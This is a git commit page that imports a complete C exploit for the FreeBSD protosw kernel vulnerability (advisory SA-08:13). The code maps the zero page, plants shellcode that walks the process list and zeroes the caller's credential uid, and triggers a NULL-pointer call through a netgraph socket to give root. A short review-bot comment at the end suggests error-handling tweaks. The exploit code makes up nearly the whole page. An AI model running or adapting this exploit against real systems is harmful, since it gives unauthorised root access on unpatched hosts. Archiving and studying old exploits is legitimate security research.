authorJason A. Donenfeld <Jason@zx2c4.com>2011-02-26 21:13:48 -0500
committerJason A. Donenfeld <Jason@zx2c4.com>2011-02-26 21:13:48 -0500
commitcc0d7ca2b5f3bde23d10d625e37c60d2af8cc761 (patch)
treefd31eaae74c2f1a770a7e6a001fb01e86c779b4c
Import Don Bailey's original exploit code.
-rw-r--r--original-known-allproc.c142
1 files changed, 142 insertions, 0 deletions
diff --git a/original-known-allproc.c b/original-known-allproc.c
new file mode 100644
index 0000000..ada7e2c
--- /dev/null
+++ b/original-known-allproc.c
@@ -0,0 +1,142 @@
+/*
+ * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
+ * defined here:
+ * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
+ *
+ * This will overwrite your credential structure in the kernel. This will
+ * affect more than just the exploit's process, which is why this doesn't
+ * spawn a shell. When the exploit has finished, your login shell should
+ * have euid=0.
+ *
+ * Enjoy, and happy holidays!
+ * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
+ */
+#include <sys/param.h>
+#include <sys/mman.h>
+#include <sys/time.h>
+#include <sys/stat.h>
+#include <sys/proc.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netgraph/ng_socket.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <errno.h>
+
+#define PAGES 1
+#define PATTERN1 0x8f8f8f8f
+#define PATTERN2 0x6e6e6e6e
+
+typedef unsigned long ulong;
+typedef unsigned char uchar;
+
+int
+x(void)
+{
+ struct proc * p = (struct proc * )PATTERN1;
+ uint * i;
+
+ while(1)
+ {
+ if(p->p_pid == PATTERN2)
+ {
+ i = (uint * )p->p_ucred;
+ *++i = 0;
+ break;
+ }
+
+ p = p->p_list.le_next;
+ }
+
+ return 1;
+}
+
+int
+main(int argc, char * argv[])
+{
+ ulong addr;
+ uchar * c;
+ uchar * d;
+ uint * i;
+ void * v;
+ int pid;
+ int s;
+
+ if(argc != 2)
+ {
+ fprintf(stderr, "usage: ./x <allproc>\n");
+ return 1;
+ }
+
+ addr = strtoul(argv[1], 0, 0);
+
+ v = mmap(
+ NULL,
+ (PAGES*PAGE_SIZE),
+ PROT_READ|PROT_WRITE|PROT_EXEC,
+ MAP_ANON|MAP_FIXED,
+ -1,
+ 0);
+ if(v == MAP_FAILED)
+ {
+ perror("mmap");
+ return 0;
+ }
+
+ c = v;
+ d = (uchar * )x;
+ while(1)
+ {
+ *c = *d;
+ if(*d == 0xc3)
+ {
+ break;
+ }
+
+ d++;
+ c++;
+ }
+
+ *c++ = 0xc3;
+
+ c = v;
+ while(1)
+ {
+ if(*(long * )c == PATTERN1)
+ {
+ *(c + 0) = addr >> 0;
+ *(c + 1) = addr >> 8;
+ *(c + 2) = addr >> 16;
+ *(c + 3) = addr >> 24;
+ break;
+ }
+ c++;
+ }
+
+ pid = getpid();
+ while(1)
+ {
+ if(*(long * )c == PATTERN2)
+ {
+ *(c + 0) = pid >> 0;
+ *(c + 1) = pid >> 8;
+ *(c + 2) = pid >> 16;
+ *(c + 3) = pid >> 24;
+ break;
+ }
+ c++;
+ }
+
+ s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
+ if(s < 0)
+ {
+ perror("socket");
+ return 1;
+ }
+
+ shutdown(s, SHUT_RDWR);
+
+ return 0;
+}
+
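Review bot: The mmap failure path at line 104 returns 0, so a failed mapping reports success to the shell even though the usage error (line 89) and the socket() failure (line 155) both return 1; `return 1;` after `perror("mmap");` keeps the exit status consistent. The `strtoul(argv[1], 0, 0)` call on line 92 is likewise unchecked, so a malformed argument silently becomes address 0 instead of being reported. Since the commit imports third-party code for the record, it may be intended verbatim; if so, a short header note such as `/* Archived as received; not maintained. */` would stop later readers from "fixing" it. A one-line comment above the mmap call recording that the technique depends on the process being permitted to map the zero page with MAP_FIXED, which later FreeBSD releases disallow by default, would also help readers understand the precondition the vendor mitigation removed.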